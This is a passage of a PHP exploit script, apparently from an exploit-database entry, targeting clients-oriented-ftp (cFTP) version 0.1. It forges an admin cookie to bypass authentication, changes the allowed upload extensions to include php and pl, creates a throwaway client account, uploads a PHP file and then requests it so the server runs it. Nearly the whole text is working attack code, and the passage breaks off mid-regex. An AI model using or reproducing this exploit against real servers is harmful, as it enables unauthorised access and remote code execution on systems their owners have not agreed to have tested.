) # Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list # Version: 0.1 # Tested on: linux // Vulnerable URL $url = 'http://[url domain]/cFTP/'; // The file to upload $filename = dirname(__FILE__).'/info.php'; $failext = array('php', 'pl'); $username = 'hackname'.rand(0, 999999); $cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-) /** * Call URL */ function curl_call_url($url, $cookies_injection, $inputs = null) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection); if (is_array($inputs) === true) { curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs); } $response = curl_exec($curl); $headers = curl_getinfo($curl); $error_number = curl_errno($curl); $error_message = curl_error($curl); curl_close($curl); return array($response, $headers, $error_number, $error_message); } // Add vulnerable extensions (php, pl : defined in $failext) list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection); if (preg_match_all('/]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) { $input = array(); $count = count($matches[0]); for ($i = 0; $i < $count; $i++) { $input[$matches[2][$i]] = $matches[4][$i]; if ($matches[2][$i] === 'allowed_file_types') { foreach ($failext as $ext) { if (strpos($matches[4][$i], $ext) === false) { $input[$matches[2][$i]] .= ','.$ext; } } $input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]); } } // add select if (preg_match('/ $username, 'add_client_form_user' => $username, 'add_client_form_pass' => 'hackname', 'add_client_form_pass2' => 'hackname', 'add_client_form_address' => 'my address', 'add_client_form_phone' => '000-000-000', //'add_client_form_notify' => '0', 'add_client_form_email' => $username.'@example.com', 'add_client_form_intcont' => '', 'Submit' => 'Create account', ); list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input); if (strpos($response, 'message_ok') !== false) { // Now upload file :-) $input = array( 'name' => 'my_hack_file', 'description' => 'It\'s my hack file', 'clientname' => $username, 'ufile' => '@'.$filename, 'Submit' => 'Upload', ); list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input); if (preg_match('#File uploaded correctly#', $response, $matches)) { // get filename list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection); if (preg_match('#